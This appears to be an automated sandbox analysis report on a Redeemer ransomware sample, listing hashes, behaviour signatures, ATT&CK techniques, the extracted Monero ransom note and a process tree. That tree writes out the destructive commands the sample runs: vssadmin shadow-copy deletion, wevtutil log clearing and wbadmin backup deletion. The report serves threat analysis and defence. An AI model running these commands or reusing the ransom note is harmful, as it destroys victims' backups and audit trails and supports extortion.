Overview

overview

10

Static

static

sqlservr.exe

windows7_x64

10

sqlservr.exe

windows10_x64

10

Analysis

  • max time kernel
    36s
  • max time network
    163s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    20-09-2021 03:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sqlservr.exe

  • Size

    1.8MB

  • MD5

    e1338c42da2d2363afbbd0eeabad1ca9

  • SHA1

    fe5d669b732c9227bb25787083906f49b732c335

  • SHA256

    61c47effdf6b6eafd20e74a8a6b52da09e082fefef31c6ae4a2046b6a756050e

  • SHA512

    bcc887777c3bcb778000893c15357abcc9a78009a1cd8ae325de787a918d98ded1100fe9b21b79b16fe1d44d5d9fe0147292164ff36cf12a13e9e31b02ed372a

Score
10/10
evasionpersistenceransomware

Malware Config

Extracted

Path

C:\Read Me.TXT

Ransom Note
8888888b. 888 888 Y88b 888 888 888 888 888 d88P .d88b. .d88888 .d88b. .d88b. 88888b.d88b. .d88b. 888d888 8888888P" d8P Y8b d88" 888 d8P Y8b d8P Y8b 888 "888 "88b d8P Y8b 888P" 888 T88b 88888888 888 888 88888888 88888888 888 888 888 88888888 888 888 T88b Y8b. Y88b 888 Y8b. Y8b. 888 888 888 Y8b. 888 888 T88b "Y8888 "Y88888 "Y8888 "Y8888 888 888 888 "Y8888 888 Made by Cerebrate - Dread Forums TOR [http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/] [Q1] What happened, I cannot open my files and they have an odd extension? [A1] Your files have been encrypted by Redeemer, a new ransomware operation. [Q2] Is there any way to recover my files? [A2] Yes, you can recover your files. This will however cost you money in XMR (Monero). [Q3] Is there any any way to recover my files without paying? [A3] Without paying it is impossible your files. Redeemer uses most secure algorithms and a sophisticated encryption scheme which guarantees security. Without a proper key, you will never regain access to your files. [Q4] What is XMR (Monero)? [A4] It is a privacy oriented cryptocurrency. You can learn more about Monero on getmonero.org. You can view ways to purchase it on www.monero.how/how-to-buy-monero. [Q5] How will I decrypt my files? [A5] Follow the general instructions: -1. Buy 02 XMR. -2. Contact helpdecryptmyfiles@yandex.com and send the following key: -----BEGIN REDEEMER PUBLIC KEY----- MTAK4k1pfaewqYz8kbtiZBAJ2bLqybEnTQUjkVbRp0QudQEkTo 2bnZAYmruQNo390d3jhST98DGo+eH6f3eMZ+3eVq6PbOLOYBwY WHHPIOV02IWPGO4917ixFp0LD6ceyEVfSWjoBjDLlBPXqJMJ89 x28YDv21MV0Jy9o4GMDVuLjfKiroFJT2sCFn+foWf4UM24SiYg jeQRvHA5i8enWNh+Jljb9zFE7h/vBKYSwbJrUoPloyWkrFq6w6 oTzs0bmP+2pCjZEVSB7CSmxpJnvJyur6jO932S/HQmwz+8B5s8 8+kfm4CPvejmkHsLZQhgsGVd5cCRoWFGCxUW/8B7jGE+LcrETn WIivmN4h2yuiTpaotewcmnOlaF+Mg36AWmyk9BjAy7KpE26yAx kYXfNPBFEQ4Xk3oIPlvtqYkDZ7LuNSZrbkrFqzBSkStOGfxElV F12dAstpole9XGWmaKAyDsOYTJBon3USW9xGzTrAe4CtqRQHOw ShY/OSFeHX8i74V1REVCWkSOPSFYPC49PSByio1tZ54rcMknBe xCqIDpLrqxTanfrRTJLqwXD4X6Mg+PJZIvYAgzVGeVac3szUl9 iwCRsSK1CB4in+mbvVvEmQ9PQgEagMW+HbhNk01KhAKpwQmZdX NLx+4cbVO4J9fURsgaRc/I/jNv2ifelKMJWQ== -----END REDEEMER PUBLIC KEY----- -3. You will receive an XMR address where you will need to pay the requested amount of Monero. -4. After you pay and the payment is verified, you will receive a decryption tool and a key which will restore all your files and your computer back to normal.
Emails

helpdecryptmyfiles@yandex.com

Signatures

  • Clears Windows event logs 1 TTPs
    evasionransomware
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Modifies WinLogon 2 TTPs 4 IoCs
    persistence
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry class 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sqlservr.exe
    "C:\Users\Admin\AppData\Local\Temp\sqlservr.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Windows\WIN_TEMP_\svchost.exe
      "C:\Windows\WIN_TEMP_\svchost.exe" C:\Users\Admin\AppData\Local\Temp\sqlservr.exe
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Deletes itself
      • Modifies WinLogon
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1256
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c vssadmin delete shadows /All /Quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3876
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin delete shadows /All /Quiet
          4⤵
          • Interacts with shadow copies
          PID:2244
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log Application
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4064
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log Application
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3892
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log Security
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:636
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log Security
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4012
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log Setup
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:840
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log Setup
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:988
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil clear-log System
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:676
        • C:\Windows\SysWOW64\wevtutil.exe
          wevtutil clear-log System
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
        3⤵
          PID:3880
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wbadmin delete systemstatebackup -deleteoldest -quiet
          3⤵
            PID:1208
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ftype redeemer="C:\Windows\system32\cmd.exe" /c msg * Redeemer Ransowmare - this file cannot be opened until decrypted. Check ReadMe.TXT for more details how to decrypt your file.
            3⤵
            • Modifies registry class
            PID:1280
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c assoc .redeem=redeemer
            3⤵
            • Modifies registry class
            PID:1308
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3724

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Winlogon Helper DLL

      1
      T1004

      Privilege Escalation

      Defense Evasion

      Indicator Removal on Host

      1
      T1070

      File Deletion

      2
      T1107

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Inhibit System Recovery

      2
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\WIN_TEMP_\svchost.exe
        MD5

        e1338c42da2d2363afbbd0eeabad1ca9

        SHA1

        fe5d669b732c9227bb25787083906f49b732c335

        SHA256

        61c47effdf6b6eafd20e74a8a6b52da09e082fefef31c6ae4a2046b6a756050e

        SHA512

        bcc887777c3bcb778000893c15357abcc9a78009a1cd8ae325de787a918d98ded1100fe9b21b79b16fe1d44d5d9fe0147292164ff36cf12a13e9e31b02ed372a

        Download Submit
      • C:\Windows\WIN_TEMP_\svchost.exe
        MD5

        e1338c42da2d2363afbbd0eeabad1ca9

        SHA1

        fe5d669b732c9227bb25787083906f49b732c335

        SHA256

        61c47effdf6b6eafd20e74a8a6b52da09e082fefef31c6ae4a2046b6a756050e

        SHA512

        bcc887777c3bcb778000893c15357abcc9a78009a1cd8ae325de787a918d98ded1100fe9b21b79b16fe1d44d5d9fe0147292164ff36cf12a13e9e31b02ed372a

        Download Submit
      • memory/636-122-0x0000000000000000-mapping.dmp
        Download
      • memory/676-126-0x0000000000000000-mapping.dmp
        Download
      • memory/840-124-0x0000000000000000-mapping.dmp
        Download
      • memory/988-125-0x0000000000000000-mapping.dmp
        Download
      • memory/1056-127-0x0000000000000000-mapping.dmp
        Download
      • memory/1208-129-0x0000000000000000-mapping.dmp
        Download
      • memory/1256-115-0x0000000000000000-mapping.dmp
        Download
      • memory/1280-130-0x0000000000000000-mapping.dmp
        Download
      • memory/1308-131-0x0000000000000000-mapping.dmp
        Download
      • memory/2244-119-0x0000000000000000-mapping.dmp
        Download
      • memory/3876-118-0x0000000000000000-mapping.dmp
        Download
      • memory/3880-128-0x0000000000000000-mapping.dmp
        Download
      • memory/3892-121-0x0000000000000000-mapping.dmp
        Download
      • memory/4012-123-0x0000000000000000-mapping.dmp
        Download
      • memory/4064-120-0x0000000000000000-mapping.dmp
        Download